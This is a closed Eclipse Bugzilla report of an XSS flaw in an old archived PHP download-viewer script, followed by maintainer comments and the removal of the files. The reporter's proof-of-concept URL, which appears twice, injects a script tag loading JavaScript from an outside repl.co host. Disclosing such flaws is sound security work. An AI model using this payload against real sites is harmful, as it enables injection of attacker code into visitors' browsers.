580460 – Xss vulnerability - /downloads-viewer.php?s=

Bug 580460 - Xss vulnerability - /downloads-viewer.php?s=

Summary: Xss vulnerability - /downloads-viewer.php?s=

Status:	CLOSED FIXED

Alias:	None

Product:	Community
Classification:	Eclipse Foundation
Component:	Vulnerability Reports (show other bugs)
Version:	unspecified
Hardware:	All All

Importance:	P3 major (vote)
Target Milestone:	---
Assignee:	Security vulnerabilitied reported against Eclipse projects
QA Contact:

URL:
Whiteboard:
Keywords:	security

Depends on:
Blocks:

Reported:	2022-07-26 20:44 EDT by Nicolas Armua
Modified:	2022-08-02 08:27 EDT (History)
CC List:	3 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Nicolas Armua

2022-07-26 20:44:24 EDT

Hi team how are you ? 
I found a vulnerability in your site
I leave the Poc Url


https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss.repl.co/script.js%3E%3C/script%3E

Comment 1 Mikaël Barbero

2022-07-29 10:02:40 EDT

@Ed, WDYT?

Comment 2 Nicolas Armua

2022-07-29 10:04:37 EDT

This is an xss vulnerability, do you know what it is?

Comment 3 Ed Merks

2022-07-29 10:18:28 EDT

I have no idea how those got there.  They look to be extremely old files with all kinds of crazy old stuff.

https://archive.eclipse.org/justj/?file=tools/emf/scripts

It looks like someone copied a backup and left it to rot...

Comment 4 Nicolas Armua

2022-07-29 10:22:17 EDT

ok, this is a bug

Comment 5 Mikaël Barbero

2022-07-29 11:25:57 EDT

@Ed, would you mind removing the files if you can?

Comment 6 Nicolas Armua

2022-07-29 11:28:22 EDT

I did not upload those files, I only found a Javascript injection in that domain,

https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss. repl.co/script.js%3E%3C/script%3E

Do you know what this is?


JavaScript injections are processes where you can insert and use your own JavaScript codes on a page, either by entering the code in the address bar or by finding a website's XSS vulnerability.

Comment 7 Mikaël Barbero

2022-07-29 12:24:04 EDT

@Nicolas, we get that. 

As the php scripts you've detected the XSS in are rotten files, I was asking @Ed to just delete those scripts.

Comment 8 Ed Merks

2022-07-29 13:45:37 EDT

Sorry, I tried but I cannot remove them:

https://ci.eclipse.org/emf/job/promotion-shell/lastBuild/console

Comment 9 Mikaël Barbero

2022-08-02 08:27:08 EDT

I've removed all php scripts in that folder. Thanks.